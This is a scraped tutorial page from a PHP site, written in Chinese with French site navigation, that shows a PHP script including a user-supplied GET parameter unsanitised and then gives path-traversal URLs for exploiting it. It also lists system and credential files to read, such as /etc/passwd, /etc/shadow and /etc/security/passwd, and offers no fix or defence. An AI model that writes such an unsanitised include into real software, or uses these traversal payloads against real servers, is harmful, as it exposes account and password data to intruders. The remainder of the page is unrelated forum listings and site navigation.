简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
Maison > développement back-end > tutoriel php > le corps du texte

php 伪造本地文件包含漏洞的代码_PHP教程

WBOY
Libérer: 2016-07-21 15:23:40
original
999 Les gens l'ont consulté

代码:

复制代码 代码如下:

$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/324439.htmlTechArticle代码: 复制代码 代码如下: ?php $page=$_GET['page']; include($page.'php'); ? 你可以这样使用 http://www.xxx.com/index.php?page=../etc/passwd http://www.xxx.com/index.p...
Étiquettes associées:
get include page php 代码 falsification Inclure 复制 文件 本地 漏洞 de
source:php.cn
Article précédent:PHP+MYSQL会员系统的登陆即权限判断实现代码_PHP教程 Article suivant:php数组函数序列之ksort()对数组的元素键名进行升序排序,保持索引关系_PHP教程
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Derniers articles par auteur
Derniers numéros
Comment lister les données d'une section par ID en utilisant la boucle while en PHP ? J'ai une table MySQL avec ces colonnes : series_id, series_color, product_name Dans la sor...
Depuis 2023-11-17 20:03:03
0
1
290
Appel à une fonction non définie create_function() Je reçois ce message sur la page d'accueil du site : Erreur fatale : Erreur non détectée :...
Depuis 2023-11-16 19:00:36
0
1
277
<?php // Étant donné une année, un mois et un jour, affiche le jour de l'année correspondant à la date (notez que l'année bissextile est 4 100 400) <?php // Étant donné une année, un mois et un jour, affiche le jour de l'année corre...
Depuis 2023-11-14 23:55:21
0
1
79
PHP coupe les espaces Unicode J'essaie de couper les espaces Unicode tels que ce caractère et j'ai pu le faire en utilis...
Depuis 2023-11-13 08:49:45
0
2
398
TYPO3 V11 : "Avertissement PHP : clé de tableau non définie", $this->request->getArguments() est vide Je suis un nouvel utilisateur de typo3, j'ai créé un plugin pour afficher les utilisateurs...
Depuis 2023-11-12 21:35:09
0
1
362
Rubriques connexes
Plus>
Recommandations populaires
Tutoriels populaires
Plus>
Tutoriels associés
Recommandations populaires
Derniers cours
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal
À propos de nous Clause de non-responsabilité Sitemap
Site Web PHP chinois:Formation PHP en ligne sur le bien-être public,Aidez les apprenants PHP à grandir rapidement!